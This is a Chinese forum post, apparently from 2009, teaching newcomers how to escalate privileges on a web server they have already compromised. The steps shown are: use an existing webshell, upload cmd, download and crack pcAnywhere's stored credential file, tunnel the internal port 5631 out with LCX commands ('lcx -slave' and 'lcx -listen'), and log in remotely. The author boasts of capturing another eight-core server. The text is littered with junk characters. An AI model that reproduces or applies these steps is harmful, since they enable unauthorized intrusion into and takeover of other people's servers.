|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。! h) x s# p$ p1 _7 D1 V) U
5 h% r: ~/ G% G
提权方法:pcanywhere+LCX* V- o2 ]' v4 {! D& h: ], {
4 K6 q& B; k6 G+ W! @! d) X获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。' m2 W( r9 a3 V) H) h
& r: c& }: q$ ~) U# A! a8 h在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
) w: R4 h9 w- l* {! j3 D( B& B7 k& I
8 r' O5 \6 }9 h6 Q& s, p查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。( j `$ j- ]; |% |& A
+ b" a! r0 ~& \# y0 `! Y: r
2 U& M. K7 L8 I( a4 I$ s) c& G呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
1 _+ }" K$ N- y$ d" \
5 @. P5 i& P4 @3 q: A. l
- M' L0 ^/ x+ m& {, k% w6 K4 o- _) ?
+ J, X6 C! |5 L- Y由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
7 ]3 y s3 ~ T4 h) T, o/ ^; _8 N1 A7 n, k! K# g. V- M: j1 t
) K* M8 p& U* ?; @/ dLCX的用法再简单说下:' @, D7 X3 C) e) }+ L9 v G5 C
' \8 L; t* a4 x3 a$ f4 x服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
% @7 r0 M9 e' R( \8 a; R7 y( q3 G, n
3 e0 k7 i# J& p6 S2 R+ l本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口); y1 E" ~. H3 b/ q/ L
+ q1 K- r; t: m! K+ C
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
3 u. F2 j1 f* Y( l, v7 t: P# U# j顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
) V/ b& A' F7 q! e( L+ [& M/ ?( }( x$ F7 l A! s
9 {* }: Q, R6 f& H4 J
7 ?' t+ S8 K2 f: Y2 O8 k
, S4 i, _1 X1 F6 ]! r' G6 L. E) s/ E; {呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。! m. R' z T' j W U
# @' J5 D {' S
. _% J& r% I$ y2 k3 Y
9 f) @: p- B5 w" ^( u8 {' P2 u
" d, g- e1 i' v! |- t; M我们本地连接试试,输入我们刚破解的账号密码, M; {" B6 e) ]& B
4 |' K m7 A- x) Y2 \/ i" A
# {% U8 j% M/ a呵呵``连接成功,服务器不错,又一个8核^︵^. t' i! w- [* p6 F/ g. A, ?
* o" m$ v; v3 x f" r' U9 o4 k: p7 W' k5 i
0 Q. p# n" f5 G! I
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
